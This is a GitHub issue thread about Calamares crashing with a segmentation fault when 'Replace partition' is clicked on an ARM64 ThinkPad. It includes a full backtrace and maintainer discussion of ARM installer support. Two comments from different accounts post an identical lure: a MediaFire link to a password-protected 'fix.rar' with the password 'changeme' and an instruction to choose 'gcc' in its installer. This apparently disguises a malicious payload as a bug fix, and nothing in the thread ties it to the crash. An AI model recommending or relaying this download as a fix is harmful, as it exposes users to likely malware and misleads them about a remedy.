### ISSUE TITLE
Segmentation fault after pressing "replace partition"

### ISSUE THREAD

**Issue by anonymix007** [endeavouros-team/calamares#54]
**Describe the bug**
Attempting to replace the partition will cause Calamares to crash.
Machine: ThinkPad T14s Gen 6 (ARM64)
Disk setup: 1 TB NVMe, dual-boot with Windows (512 GiB free unallocated size)

**To Reproduce**
1. Go to 'Partitioning'
2. Click on 'Replace partition'
3. See the crash

**Expected behavior**
It shouldn't crash

**Screenshots and Logs**
```
Application: Calamares (calamares), signal: Segmentation fault

[KCrash Handler]
#4  0x0000ffff98ae779c in QComboBox::count() const () from /usr/lib/libQt6Widgets.so.6
#5  0x0000ffff7214bb70 in operator() (__closure=__closure@entry=0xffff3920e480, doReuseHomePartition=false) at /home/don/Documents/src/calamares-24.06.1.2/src/modules/partition/gui/ChoicePage.cpp:877
#6  0x0000ffff7214c770 in std::__invoke_impl<void, ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>&, bool&> (__f=...) at /usr/include/c++/14.1.1/bits/invoke.h:60
#7  std::__invoke<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>&, bool&> (__fn=...) at /usr/include/c++/14.1.1/bits/invoke.h:96
#8  std::invoke<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>&, bool&> (__fn=...) at /usr/include/c++/14.1.1/functional:120
#9  operator() (__closure=0xffff3920e480, function=..., args#0=<optimized out>) at /usr/include/qt6/QtConcurrent/qtconcurrentstoredfunctioncall.h:116
#10 std::__invoke_impl<void, const QtConcurrent::StoredFunctionCall<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>::runFunctor()::<lambda(std::decay_t<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)> >, std::decay_t<bool>)>&, ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>(std::__invoke_other, const struct {...} &) (__f=...) at /usr/include/c++/14.1.1/bits/invoke.h:61
#11 0x0000ffff7214c7d8 in std::__invoke<const QtConcurrent::StoredFunctionCall<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>::runFunctor()::<lambda(std::decay_t<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)> >, std::decay_t<bool>)>&, ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool> (__fn=...) at /usr/include/c++/14.1.1/bits/invoke.h:96
#12 std::__apply_impl<const QtConcurrent::StoredFunctionCall<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>::runFunctor()::<lambda(std::decay_t<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)> >, std::decay_t<bool>)>&, std::tuple<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>, 0, 1> (__f=..., __t=...) at /usr/include/c++/14.1.1/tuple:2921
#13 std::apply<const QtConcurrent::StoredFunctionCall<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>::runFunctor()::<lambda(std::decay_t<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)> >, std::decay_t<bool>)>&, std::tuple<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool> > (__f=..., __t=...) at /usr/include/c++/14.1.1/tuple:2936
#14 QtConcurrent::StoredFunctionCall<ChoicePage::doReplaceSelectedPartition(const QModelIndex&)::<lambda(bool)>, bool>::runFunctor(void) (this=<optimized out>) at /usr/include/qt6/QtConcurrent/qtconcurrentstoredfunctioncall.h:120
#15 0x0000ffff721109bc in QtConcurrent::RunFunctionTaskBase<void>::run (this=0xaaaadec43050) at /usr/include/qt6/QtConcurrent/qtconcurrentrunbase.h:83
#16 0x0000ffff97575cf8 in ?? () from /usr/lib/libQt6Core.so.6
#17 0x0000ffff9756a674 in ?? () from /usr/lib/libQt6Core.so.6
#18 0x0000ffff990ca624 in ?? () from /usr/lib/libc.so.6
#19 0x0000ffff9913064c in ?? () from /usr/lib/libc.so.6

Thread 1 (Thread 0xffff9a52d020 (LWP 2035) "calamares"):
#1  0x0000ffff990c9828 in pthread_cond_wait () from /usr/lib/libc.so.6
#2  0x0000ffff975798c8 in QWaitCondition::wait(QMutex*, QDeadlineTimer) () from /usr/lib/libQt6Core.so.6
#3  0x0000ffff9756a164 in QThread::wait(QDeadlineTimer) () from /usr/lib/libQt6Core.so.6
#4  0x0000ffff9793f780 in ?? () from /usr/lib/libQt6DBus.so.6
#5  0x0000ffff9793f55c in ?? () from /usr/lib/libQt6DBus.so.6
#6  0x0000ffff9907f6e8 in ?? () from /usr/lib/libc.so.6
#7  0x0000ffff9907f7c4 in exit () from /usr/lib/libc.so.6
#8  0x0000ffff986d70c4 in _XDefaultIOError () from /usr/lib/libX11.so.6
#9  0x0000ffff986d7414 in _XIOError () from /usr/lib/libX11.so.6
#10 0x0000ffff986d4b7c in _XFlush () from /usr/lib/libX11.so.6
#11 0x0000ffff986b2bd0 in XFlush () from /usr/lib/libX11.so.6
#12 0x0000ffff9176a998 in QXcbConnection::processXcbEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/qt6/plugins/platforms/../../../libQt6XcbQpa.so.6
#13 0x0000ffff9178caac in ?? () from /usr/lib/qt6/plugins/platforms/../../../libQt6XcbQpa.so.6
#14 0x0000ffff95ad96ec in ?? () from /usr/lib/libglib-2.0.so.0
#15 0x0000ffff95adc04c in ?? () from /usr/lib/libglib-2.0.so.0
#16 0x0000ffff95adc924 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
#17 0x0000ffff976bd24c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/libQt6Core.so.6
#18 0x0000ffff9738a670 in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/libQt6Core.so.6
#19 0x0000ffff97385ba8 in QCoreApplication::exec() () from /usr/lib/libQt6Core.so.6
#20 0x0000aaaad85e3454 in main (argc=<optimized out>, argv=<optimized out>) at /home/don/Documents/src/calamares-24.06.1.2/src/calamares/main.cpp:153
[Inferior 1 (process 2035) detached]
```

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dalto8** [comment]
What ISO are you using?  I can't duplicate this issue.

**Comment by anonymix007** [comment]
There isn't an ISO yet since it's ARM. Here are the configs I used (based on ones from latest x86 ISO but with unavailable packages removed): [calamares-config.tar.gz](https://github.com/user-attachments/files/16751244/calamares-config.tar.gz)

**Comment by dalto8** [comment]
This is a customized version of Calamares for installing EndeavourOS.  If you are building your own distro, you should probably use the upstream Calamares at https://github.com/calamares/calamares

**Comment by anonymix007** [comment]
I'm not building my own distro though, but rather a more or less generic EndeavourOS ARM installer for X Elite laptops.

**Comment by dalto8** [comment]
I am not really sure how to help you here.  Normally, I would run it through the debugger to see what it has happening.

However, it seems like it can't be reproduced without hardware I don't have.

My best advice it to fire up a debugger and step through it to find the issue.

**Comment by anonymix007** [comment]
It's probably just a bad package build. The package which is currently available doesn't even start anymore. However, source-built one seemed to work almost perfectly with custom config (since some packages are not available for arm).
But I ended up having unbootable system because kernel vanished after installation somehow. I'll open a separate issue for this.

**Comment by killajoe** [comment]
> The package which is currently available doesn't even start anymore

we do not use calamares way to install ARM devices anymore for the moment.  What we used before is this: https://github.com/endeavouros-arm/calamares-image
For ARM related issue you should report here: https://github.com/endeavouros-arm
Or even here:
https://forum.endeavouros.com/c/arm/installation/101

**Comment by anonymix007** [comment]
> we do not use calamares way to install ARM devices anymore for the moment

Maybe you should at least for Snapdragon devices?

> https://github.com/endeavouros-arm/calamares-image

This does not what one would expect it to.

**Comment by killajoe** [comment]
> Maybe you should at least for Snapdragon devices?

indeed.. i only said what we have now ;) better to discuss on the related repos or at the forum.

**Comment by anonymix007** [comment]
> For ARM related issue you should report here

It's not really an issue, it's just that this use case was never intended.
As of now, ARM images are only available for SBCs which generally don't have internal storage (at best, it would be some eMMC or even an SD card) and using USB drive to boot and install the OS is not what everyone usually does with them.

However, this (booting off a USB drive for installing onto the internal storage, i.e. NVMe) is exactly what everyone's got used to on the laptops no matter the architecture. So having a x86-64 alike installation option kind of makes sense for Snapdragon X laptops (and even for some older models like ThinkPad X13s Gen 1). 
There isn't much to discuss here though. It's just a matter of changing some configs in this repo (since it almost builds just fine on ARM) or updating module's behavior.
